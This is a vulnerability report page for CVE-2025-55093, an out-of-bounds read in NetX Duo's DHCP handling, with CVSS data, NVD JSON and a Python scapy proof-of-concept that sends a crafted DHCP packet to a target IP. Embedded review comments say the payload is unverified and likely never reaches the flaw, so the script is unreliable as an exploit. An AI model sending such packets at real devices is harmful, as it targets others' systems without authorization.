Security Vulnerability Report
CVE-2025-55093 CVSS 5.3 MEDIUM

CVE-2025-55093

Published: 2025-10-17 05:15:35
Last Modified: 2025-10-24 20:23:42

Description

In NetX Duo before 6.4.4, the networking support module for Eclipse Foundation ThreadX, there was a potential out of bound read issue in _nx_ipv4_packet_receive() when handling unicast DHCP messages that could cause corruption of 4 bytes of memory.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:eclipse:threadx_netx_duo:*:*:*:*:*:*:*:* - VULNERABLE
Eclipse ThreadX NetX Duo < 6.4.4 (the NVD match criteria in the raw JSON below give versionEndExcluding 6.4.4.202503)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
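# CVE-2025-55093 PoC - NetX Duo _nx_ipv4_packet_receive() OOB read
#
# Sends one DHCP-shaped UDP datagram (server port 67 -> client port 68) to a
# NetX Duo host. Per the advisory text, releases before 6.4.4 have a potential
# out-of-bounds read in _nx_ipv4_packet_receive() when handling unicast DHCP
# messages, which could corrupt 4 bytes of memory.
#
# NOTE(review): the advisory text does not say which header or option field
# is mis-read, so the payload below is unverified against the actual flaw.
# The script only transmits; it never observes the target, so a completed
# send is not evidence that a device is (or is not) affected. Establish
# exposure from the NetX Duo version in the firmware (fixed in 6.4.4).

import socket
import sys

from scapy.all import IP, UDP, Ether, Raw, sendp


def craft_dhcp_unicast_packet(target_ip, target_port=68):
    """Build the Ethernet/IPv4/UDP frame carrying the BOOTP/DHCP reply payload.

    Args:
        target_ip: Dotted-quad IPv4 address used both as the IP destination
            and as the "your IP" field of the BOOTP header.
        target_port: UDP destination port; defaults to 68, the DHCP client
            port.

    Returns:
        A scapy packet: Ether / IP / UDP / Raw(payload).

    Raises:
        OSError: if ``target_ip`` is not a valid IPv4 string
            (raised by ``socket.inet_aton``).
    """
    # Link layer: broadcast destination MAC (the original author marks this
    # layer as optional, depending on network setup).
    eth = Ether(dst="ff:ff:ff:ff:ff:ff")

    # Plain IPv4 header: fixed source address and the UDP protocol number.
    # No header field is set to an out-of-range value here.
    ip = IP(
        dst=target_ip,
        src="192.168.1.100",
        proto=17,  # UDP
    )

    # DHCP server port -> DHCP client port.
    udp = UDP(
        sport=67,
        dport=target_port,
    )

    server_addr = socket.inet_aton("192.168.1.1")
    fields = [
        # --- Fixed BOOTP header ---
        b'\x02',                      # op: BOOTREPLY
        b'\x01',                      # hardware type: Ethernet
        b'\x06',                      # hardware address length
        b'\x00',                      # hops
        b'\x00\x01\x51\x80',          # transaction ID
        b'\x00\x00',                  # seconds elapsed
        b'\x00\x00',                  # BOOTP flags
        server_addr,                  # client IP
        socket.inet_aton(target_ip),  # your IP
        server_addr,                  # server IP
        socket.inet_aton("0.0.0.0"),  # gateway IP
        b'\x00\x1a\x2b\x3c\x4d\x5e',  # client MAC
        # Zero fill up to the magic cookie: 10 + 64 + 128 bytes, i.e. the
        # rest of the 16-byte hardware-address field plus the server-name
        # and boot-file fields of the BOOTP layout.
        b'\x00' * 202,
        b'\x63\x82\x53\x63',          # DHCP magic cookie
        # --- DHCP options ---
        b'\x35\x01\x05',              # option 53: message type = ACK
        b'\x36\x04' + server_addr,    # option 54: server identifier
        # The original author labels these two bytes a "malformed option
        # with length that causes OOB read".
        # NOTE(review): 0xFF is the DHCP End option code (RFC 2132), so a
        # conforming option parser stops at the first of these bytes;
        # nothing on the page shows that they reach the flawed check.
        b'\xff\xff',
        b'\x00' * 10,                 # padding
        b'\xff',                      # End option
    ]
    dhcp_payload = b''.join(fields)

    return eth / ip / udp / Raw(load=dhcp_payload)


def send_exploit(target_ip):
    """Build the frame for ``target_ip`` and transmit it once at layer 2.

    Only the transmission outcome is reported. No reply is read and the
    target is never probed afterwards, so the output deliberately makes no
    statement about whether the target is vulnerable.
    """
    print(f"[*] Crafting malicious DHCP unicast packet for {target_ip}")
    packet = craft_dhcp_unicast_packet(target_ip)

    print("[*] Sending exploit packet...")
    try:
        sendp(packet, verbose=True)
    except Exception as e:  # script boundary: report the failure and return
        print(f"[-] Error sending packet: {e}")
    else:
        print("[+] Packet sent successfully")
        # The original printed "may be vulnerable" here without having
        # observed anything; a completed send says nothing about the target.
        print(
            f"[!] Send completed; this does not confirm that {target_ip} "
            "is affected by CVE-2025-55093"
        )


if __name__ == "__main__":
    if len(sys.argv) != 2:
        print(f"Usage: {sys.argv[0]} <target_ip>")
        sys.exit(1)

    send_exploit(sys.argv[1])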

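References

Vendor advisory (Eclipse ThreadX NetX Duo): https://github.com/eclipse-threadx/netxduo/security/advisories/GHSA-c9pq-93jp-w649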

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-55093", "sourceIdentifier": "[email protected]", "published": "2025-10-17T05:15:35.140", "lastModified": "2025-10-24T20:23:41.553", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In NetX Duo before 6.4.4, the networking support module for Eclipse Foundation ThreadX, there was a potential out of bound read issue in _nx_ipv4_packet_receive() when handling unicast DHCP messages that could cause corruption of 4 bytes of memory."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 6.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": 
"NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-126"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-125"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:eclipse:threadx_netx_duo:*:*:*:*:*:*:*:*", "versionEndExcluding": "6.4.4.202503", "matchCriteriaId": "24743F34-C00F-4CB2-BCEE-2BB29FA265CB"}]}]}], "references": [{"url": "https://github.com/eclipse-threadx/netxduo/security/advisories/GHSA-c9pq-93jp-w649", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}